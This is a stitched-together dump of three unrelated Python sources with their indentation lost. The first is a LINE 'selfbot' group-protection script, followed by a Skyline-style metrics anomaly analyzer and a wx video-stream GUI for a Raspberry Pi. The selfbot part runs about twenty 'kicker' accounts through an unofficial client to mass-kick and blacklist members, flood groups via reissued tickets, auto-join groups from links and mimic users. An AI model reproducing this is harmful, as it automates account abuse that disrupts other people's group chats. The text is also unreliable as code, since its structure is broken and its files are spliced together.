kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
pass
return
if ga9 in op.param3:
if op.param2 in Bots or op.param2 in owner or op.param2 in admin or op.param2 in staff:
    pass
else:
wait["blacklist"][op.param2] = True
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
G = kicker3.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.updateGroup(G)
Ticket = kicker3.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker3.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker3.updateGroup(G)
Ticket = kicker3.reissueGroupTicket(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker19.acceptGroupInvitation(op.param1)
except:
pass
return
if ga10 in op.param3:
if op.param2 in Bots or op.param2 in owner or op.param2 in admin or op.param2 in staff:
    pass
else:
wait["blacklist"][op.param2] = True
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
G = kicker4.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.updateGroup(G)
Ticket = kicker4.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker4.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker4.updateGroup(G)
Ticket = kicker4.reissueGroupTicket(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker20.acceptGroupInvitation(op.param1)
except:
pass
return
#==============================================================================================================
#=====================================[OP TYPE 55 / 25 / 26 MESSAGE EVENTS]===================================
#==============================================================================================================
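# op.type 55: if the user in op.param2 is blacklisted and not privileged, kick them
# with a random bot account and re-lock joining the group by ticket.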
if op.type == 55:
if op.param2 in wait["blacklist"]:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
G = line.getGroup(op.param1)
G.preventedJoinByTicket = True
random.choice(ABC).updateGroup(G)
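# op.type 25: handle a message sent from this account (auto-join by ticket, command
# dispatch via executeCmd, profile/group picture updates, sticker/contact/post info).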
if op.type == 25:
msg = op.message
text = str(msg.text)
msg_id = msg.id
receiver = msg.to
sender = msg._from
to = sender if not msg.toType and sender != myMid else receiver
txt = text.lower()
cmd = command(text)
setKey = settings['setKey']['key'] if settings['setKey']['status'] else ''
if text in tmp_text:
return tmp_text.remove(text)
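# Text message: when autoJoin by ticket is enabled, pull every group ticket out of
# the text, look the group up and join it unless already a member, then run the
# text through executeCmd as a potential command.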
if msg.contentType == 0: # Content type is text
if '/ti/g/' in text and settings['autoJoin']['ticket']:
regex = re.compile(r'(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = regex.findall(text)
tickets = []
gids = line.getGroupIdsJoined()
for link in links:
if link not in tickets:
tickets.append(link)
for ticket in tickets:
try:
group = line.findGroupByTicket(ticket)
except:
continue
if group.id in gids:
line.sendMessage(to, 'Already in group ' + group.name)
continue
line.acceptGroupInvitationByTicket(group.id, ticket)
if settings['autoJoin']['reply']:
if '@!' not in settings['autoJoin']['message']:
line.sendMessage(to, settings['autoJoin']['message'])
else:
line.sendMentionV2(to, settings['autoJoin']['message'], [sender])
line.sendMessage(to, 'Joined group ' + group.name)
try:
executeCmd(msg, text, txt, cmd, msg_id, receiver, sender, to, setKey)
except TalkException as talk_error:
logError(talk_error)
if talk_error.code in [7, 8, 20]:
sys.exit(1)
line.sendMessage(to, 'An error occurred\n' + str(talk_error))
time.sleep(3)
except Exception as error:
logError(error)
line.sendMessage(to, 'An error occurred\n' + str(error))
time.sleep(3)
elif msg.contentType == 1: # Content type is image
if settings['changePictureProfile']:
path = line.downloadObjectMsg(msg_id, saveAs='tmp/picture.jpg')
line.updateProfilePicture(path)
line.sendMessage(to, 'Profile picture changed successfully')
settings['changePictureProfile'] = False
elif settings['changeCoverProfile']:
path = line.downloadObjectMsg(msg_id, saveAs='tmp/cover.jpg')
line.updateProfileCover(path)
line.sendMessage(to, 'Profile cover changed successfully')
settings['changeCoverProfile'] = False
elif to in settings['changeGroupPicture'] and msg.toType == 2:
path = line.downloadObjectMsg(msg_id, saveAs='tmp/grouppicture.jpg')
line.updateGroupPicture(to, path)
line.sendMessage(to, 'Group picture changed successfully')
settings['changeGroupPicture'].remove(to)
elif msg.contentType == 7: # Content type is sticker
if settings['checkSticker']:
res = '╭───「 Sticker Info 」'
res += '\n├ Sticker ID : ' + msg.contentMetadata['STKID']
res += '\n├ Sticker Packages ID : ' + msg.contentMetadata['STKPKGID']
res += '\n├ Sticker Version : ' + msg.contentMetadata['STKVER']
res += '\n├ Sticker Link : line://shop/detail/' + msg.contentMetadata['STKPKGID']
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
elif msg.contentType == 13: # Content type is contact
if settings['checkContact']:
mid = msg.contentMetadata['mid']
try:
contact = line.getContact(mid)
except:
return line.sendMessage(to, 'An error occurred fetching contact ' + mid)
res = '╭───「 Details Contact 」'
res += '\n├ MID : ' + mid
res += '\n├ Display Name : ' + str(contact.displayName)
if contact.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(contact.displayNameOverridden)
res += '\n├ Status Message : ' + str(contact.statusMessage)
res += '\n╰───「SelfBot ProtectV2.2」'
if contact.pictureStatus:
line.sendImageWithURL(to, 'http://dl.profile.line-cdn.net/' + contact.pictureStatus)
cover = line.getProfileCoverURL(mid)
line.sendImageWithURL(to, str(cover))
line.sendMessage(to, parsingRes(res))
elif msg.contentType == 16: # Content type is album/note
if settings['checkPost']:
if msg.contentMetadata['serviceType'] in ['GB', 'NT', 'MH']:
if msg.contentMetadata['serviceType'] in ['GB', 'NT']:
contact = line.getContact(sender)
author = contact.displayName
else:
author = msg.contentMetadata['serviceName']
posturl = msg.contentMetadata['postEndUrl']
res = '╭───「 Details Post 」'
res += '\n├ Creator : ' + author
res += '\n├ Post Link : ' + posturl
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
elif op.type == 26:
msg = op.message
text = str(msg.text)
msg_id = msg.id
receiver = msg.to
sender = msg._from
to = sender if not msg.toType and sender != myMid else receiver
txt = text.lower()
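# autoRead: immediately mark the incoming message as read from every kicker account and g1.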
if settings['autoRead']:
for client in (kicker, kicker2, kicker3, kicker4, kicker5, kicker6, kicker7, kicker8, kicker9, kicker10, kicker11, kicker12, kicker13, kicker14, kicker15, kicker16, kicker17, kicker18, kicker19, kicker20, g1):
    client.sendChatChecked(to, msg_id)
if msg.contentType == 0: # Content type is text
if '/ti/g/' in text and settings['autoJoin']['ticket']:
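# Pull group invite tickets (line://ti/g/... or line.me/R/ti/g/...) out of the text,
# de-duplicate them, and join each group this account is not already a member of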
regex = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = regex.findall(text)
tickets = []
gids = line.getGroupIdsJoined()
for link in links:
if link not in tickets:
tickets.append(link)
for ticket in tickets:
try:
group = line.findGroupByTicket(ticket)
except:
continue
if group.id in gids:
line.sendMessage(to, 'I\'m already on group ' + group.name)
continue
line.acceptGroupInvitationByTicket(group.id, ticket)
if settings['autoJoin']['reply']:
if '@!' not in settings['autoJoin']['message']:
line.sendMessage(to, settings['autoJoin']['message'])
else:
line.sendMentionV2(to, settings['autoJoin']['message'], [sender])
line.sendMessage(to, 'Success join to group ' + group.name)
if settings['mimic']['status']:
if sender in settings['mimic']['target'] and settings['mimic']['target'][sender]:
try:
line.sendMessage(to, text, msg.contentMetadata)
tmp_text.append(text)
except:
pass
if settings['autoRespondMention']['status']:
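# Auto-reply only when this account is mentioned by someone else in a room/group
# message (a few non-plain-text content types are skipped)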
if msg.toType in [1, 2] and 'MENTION' in msg.contentMetadata.keys() and sender != myMid and msg.contentType not in [6, 7, 9]:
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = [mention['M'] for mention in mentions['MENTIONEES']]
if myMid in mentionees:
if line.getProfile().displayName in text:
if '@!' not in settings['autoRespondMention']['message']:
line.sendMessage(to, settings['autoRespondMention']['message'])
else:
line.sendMentionV2(to, settings['autoRespondMention']['message'], [sender])
if settings['autoRespond']['status']:
if msg.toType == 0:
contact = line.getContact(sender)
if contact.attributes != 32 and 'MENTION' not in msg.contentMetadata.keys():
if '@!' not in settings['autoRespond']['message']:
line.sendMessage(to, settings['autoRespond']['message'])
else:
line.sendMentionV2(to, settings['autoRespond']['message'], [sender])
if op.type == 55:
if op.param1 in lurking:
if lurking[op.param1]['status'] and op.param2 not in lurking[op.param1]['members']:
lurking[op.param1]['members'].append(op.param2)
if lurking[op.param1]['reply']['status']:
if '@!' not in lurking[op.param1]['reply']['message']:
line.sendMessage(op.param1, lurking[op.param1]['reply']['message'])
else:
line.sendMentionV2(op.param1, lurking[op.param1]['reply']['message'], [op.param2])
except TalkException as talk_error:
logError(talk_error)
if talk_error.code in [7, 8, 20]:
sys.exit(1)
except KeyboardInterrupt:
sys.exit('##---- KEYBOARD INTERRUPT -----##')
except Exception as error:
logError(error)
while True:
try:
ops = oepoll.singleTrace(count=80)
if ops is not None:
for op in ops:
oepoll.setRevision(op.revision)
thread1 = threading.Thread(target=executeOp, args=(op,))
thread1.daemon = True
thread1.start()
except Exception as e:
pass
|
analyzer.py
|
import logging
from Queue import Empty
from redis import StrictRedis
from time import time, sleep
from threading import Thread
from collections import defaultdict
from multiprocessing import Process, Manager, Queue
from msgpack import Unpacker, unpackb, packb
from os import path, kill, getpid, system
from math import ceil
import traceback
import operator
import socket
import settings
from alerters import trigger_alert
from algorithms import run_selected_algorithm
from algorithm_exceptions import *
from graphite import Graphite
logger = logging.getLogger("AnalyzerLog")
class Analyzer(Thread):
def __init__(self, parent_pid):
"""
Initialize the Analyzer
"""
super(Analyzer, self).__init__()
self.redis_conn = StrictRedis(host = settings.REDIS_HOST)
self.daemon = True
self.parent_pid = parent_pid
self.current_pid = getpid()
self.anomalous_metrics = Manager().list()
self.exceptions_q = Queue()
self.anomaly_breakdown_q = Queue()
def check_if_parent_is_alive(self):
"""
Exit if this process or its parent is no longer alive.
"""
try:
kill(self.current_pid, 0)
kill(self.parent_pid, 0)
except:
exit(0)
def send_graphite_metric(self, name, value):
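# Push a single datapoint to Carbon over the plaintext protocol:
# "<metric name> <value> <unix timestamp>\n"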
if settings.GRAPHITE_HOST != '':
sock = socket.socket()
sock.connect((settings.GRAPHITE_HOST.replace('http://', ''), settings.CARBON_PORT))
sock.sendall('%s %s %i\n' % (name, value, time()))
sock.close()
return True
return False
def spin_process(self, i, unique_metrics):
"""
Assign a bunch of metrics for a process to analyze.
"""
# Discover assigned metrics
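# Processes are numbered 1..ANALYZER_PROCESSES; each takes a contiguous slice of the
# metric list and the last process also picks up any remainder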
keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES)))
if i == settings.ANALYZER_PROCESSES:
assigned_max = len(unique_metrics)
else:
assigned_max = i * keys_per_processor
assigned_min = assigned_max - keys_per_processor
assigned_keys = range(assigned_min, assigned_max)
# Compile assigned metrics
assigned_metrics = [unique_metrics[index] for index in assigned_keys]
# Check if this process is unnecessary
if len(assigned_metrics) == 0:
return
# Multi get series
raw_assigned = self.redis_conn.mget(assigned_metrics)
# Make process-specific dicts
exceptions = defaultdict(int)
anomaly_breakdown = defaultdict(int)
# Distill timeseries strings into lists
for i, metric_name in enumerate(assigned_metrics):
self.check_if_parent_is_alive()
try:
raw_series = raw_assigned[i]
unpacker = Unpacker(use_list = False)
unpacker.feed(raw_series)
timeseries = list(unpacker)
anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_name)
# If it's anomalous, add it to list
if anomalous:
base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
metric = [datapoint, base_name]
self.anomalous_metrics.append(metric)
# Get the anomaly breakdown - who returned True?
for index, value in enumerate(ensemble):
if value:
algorithm = settings.ALGORITHMS[index]
anomaly_breakdown[algorithm] += 1
# It could have been deleted by the Roomba
except TypeError:
exceptions['DeletedByRoomba'] += 1
except TooShort:
exceptions['TooShort'] += 1
except Stale:
exceptions['Stale'] += 1
except Boring:
exceptions['Boring'] += 1
except:
exceptions['Other'] += 1
logger.info(traceback.format_exc())
for i, metric_name in enumerate(settings.AGGREGATED_METRIC):
g = Graphite(metric_name)
time_series = g.time_series("-24h")
try:
anomalous, ensemble, datapoint = run_selected_algorithm(time_series, metric_name)
if anomalous:
base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
metric = [datapoint, base_name]
self.anomalous_metrics.append(metric)
# Get the anomaly breakdown - who returned True?
for index, value in enumerate(ensemble):
if value:
algorithm = settings.ALGORITHMS[index]
anomaly_breakdown[algorithm] += 1
except TooShort:
exceptions['TooShort'] += 1
except Stale:
exceptions['Stale'] += 1
except Boring:
exceptions['Boring'] += 1
except:
exceptions['Other'] += 1
logger.info(traceback.format_exc())
# Add values to the queue so the parent process can collate
for key, value in anomaly_breakdown.items():
self.anomaly_breakdown_q.put((key, value))
for key, value in exceptions.items():
self.exceptions_q.put((key, value))
def run(self):
"""
Called when the process initializes.
"""
while 1:
now = time()
# Make sure Redis is up
try:
self.redis_conn.ping()
except:
logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
sleep(10)
self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH)
continue
# Discover unique metrics
unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))
if len(unique_metrics) == 0:
logger.info('no metrics in redis. try adding some - see README')
sleep(10)
continue
# Spawn processes
pids = []
for i in range(1, settings.ANALYZER_PROCESSES + 1):
if i > len(unique_metrics):
logger.info('WARNING: skyline is set for more cores than needed.')
break
p = Process(target=self.spin_process, args=(i, unique_metrics))
pids.append(p)
p.start()
# Send wait signal to zombie processes
for p in pids:
p.join()
# Grab data from the queue and populate dictionaries
exceptions = dict()
anomaly_breakdown = dict()
while 1:
try:
key, value = self.anomaly_breakdown_q.get_nowait()
if key not in anomaly_breakdown.keys():
anomaly_breakdown[key] = value
else:
anomaly_breakdown[key] += value
except Empty:
break
while 1:
try:
key, value = self.exceptions_q.get_nowait()
if key not in exceptions.keys():
exceptions[key] = value
else:
exceptions[key] += value
except Empty:
break
# Send alerts
if settings.ENABLE_ALERTS:
for alert in settings.ALERTS:
for metric in self.anomalous_metrics:
if alert[0] in metric[1]:
cache_key = 'last_alert.%s.%s' % (alert[1], metric[1])
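# Only alert if no un-expired key exists; setex then suppresses repeat alerts
# for this alerter/metric pair for alert[2] seconds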
try:
last_alert = self.redis_conn.get(cache_key)
if not last_alert:
self.redis_conn.setex(cache_key, alert[2], packb(metric[0]))
trigger_alert(alert, metric)
except Exception as e:
logger.error("couldn't send alert: %s" % e)
# Write anomalous_metrics to static webapp directory
file_name = 'anomalies.json'
filename = path.abspath(path.join(path.dirname(__file__), '..',
settings.ANOMALY_DUMP_DIRECTORY, file_name))
with open(filename, 'w') as fh:
# Make it JSONP with a handle_data() function
anomalous_metrics = list(self.anomalous_metrics)
anomalous_metrics.sort(key=operator.itemgetter(1))
fh.write('handle_data(%s)' % anomalous_metrics)
# Log progress
logger.info('seconds to run :: %.2f' % (time() - now))
logger.info('total metrics :: %d' % len(unique_metrics))
logger.info('total analyzed :: %d' % (len(unique_metrics) - sum(exceptions.values())))
logger.info('total anomalies :: %d' % len(self.anomalous_metrics))
logger.info('exception stats :: %s' % exceptions)
logger.info('anomaly breakdown :: %s' % anomaly_breakdown)
# Log to Graphite
self.send_graphite_metric('skyline.analyzer.run_time', '%.2f' % (time() - now))
self.send_graphite_metric('skyline.analyzer.total_analyzed', '%.2f' % (len(unique_metrics) - sum(exceptions.values())))
# Check canary metric
raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC)
if raw_series is not None:
unpacker = Unpacker(use_list = False)
unpacker.feed(raw_series)
timeseries = list(unpacker)
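# time_human: span of the canary series in hours; projected: rough estimate of how
# long a full 24h of data would take to analyze at the current run time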
time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600
projected = 24 * (time() - now) / time_human
logger.info('canary duration :: %.2f' % time_human)
self.send_graphite_metric('skyline.analyzer.duration', '%.2f' % time_human)
self.send_graphite_metric('skyline.analyzer.projected', '%.2f' % projected)
# Reset counters
self.anomalous_metrics[:] = []
# Sleep if it went too fast
if time() - now < 5:
logger.info('sleeping due to low run time...')
sleep(10)
|
main.py
|
import SocketServer
import socket
import threading
import cv2
import numpy as np
import wx
from wx.lib.pubsub import pub
import about
class VideoStreamHandler(SocketServer.StreamRequestHandler):
"""docstring for ShowCapture"""
def handle(self):
stream_bytes = ' '
# stream video frames one by one
try:
while True:
stream_bytes += self.rfile.read(2048)
first = stream_bytes.find('\xff\xd8')
last = stream_bytes.find('\xff\xd9')
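# A complete JPEG frame sits between the SOI marker (0xFFD8) and the EOI marker (0xFFD9);
# slice it out of the byte stream and decode it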
if first != -1 and last != -1:
jpg = stream_bytes[first:last + 2]
stream_bytes = stream_bytes[last + 2:]
image = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8),
cv2.IMREAD_UNCHANGED)
wx.CallAfter(pub.sendMessage, "panelListener", image=image)
finally:
cv2.destroyAllWindows()
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
"""docstring for ShowCapture"""
pass
class ThreadServer(object):
"""docstring for ShowCapture"""
def __init__(self):
# Host 0.0.0.0 means to listen all ip address
HOST, PORT = "0.0.0.0", 2016
self.server = ThreadedTCPServer((HOST, PORT), VideoStreamHandler)
ip, port = self.server.server_address
# Start a thread with the server -- that thread will then start one
# more thread for each request
server_thread = threading.Thread(target=self.server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
print "Server loop running in thread:", server_thread.name
print 'Starting up TCP Server. Server listening on {0} port {1}'.format(ip, port)
class ShowCapture(wx.Panel):
"""docstring for ShowCapture"""
def __init__(self, parent, fps=15):
wx.Panel.__init__(self, parent)
self.parent = parent
self.width, self.height = 640, 480
self.parent.SetSize((self.width, self.height))
self.fps = fps
pub.subscribe(self.ReceivedImage, "panelListener")
self.SetFocus()
def ReceivedImage(self, image):
self.capture = image
frame = self.capture
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
self.bmp = wx.BitmapFromBuffer(self.width, self.height, frame)
self.timer = wx.Timer(self)
self.timer.Start(1000./self.fps)
self.Bind(wx.EVT_PAINT, self.OnPaint)
self.Bind(wx.EVT_TIMER, self.NextFrame)
self.Bind(wx.EVT_KEY_DOWN, self.KeyboardCatch)
def OnPaint(self, evt):
dc = wx.BufferedPaintDC(self)
dc.DrawBitmap(self.bmp, 0, 0)
def NextFrame(self, event):
frame = self.capture
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
self.bmp.CopyFromBuffer(frame)
self.Refresh()
def KeyboardCatch(self, e):
keycode = e.GetKeyCode()
print keycode
message = ""
if keycode == 65:
message = "a"
elif keycode == 68:
message = "d"
elif keycode == 87:
message = "w"
elif keycode == 83:
message = "s"
else:
message = "Unknown command."
try:
self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client.connect(('raspberrypi.mshome.net', 2015))
self.client.sendall(message)
self.parent.statusbar.SetStatusText("Send the following message: " + message)
except socket.error, err:
self.parent.statusbar.SetStatusText('Please start TCP server before running GUI. ' + \
'The command out is not working')
print err
except Exception, exc:
print exc
finally:
self.client.close()
class MainFrame(wx.Frame):
"""docstring for MainFrame"""
def __init__(self, parent, title):
super(MainFrame, self).__init__(parent, title=title)
self.threadServer = ThreadServer()
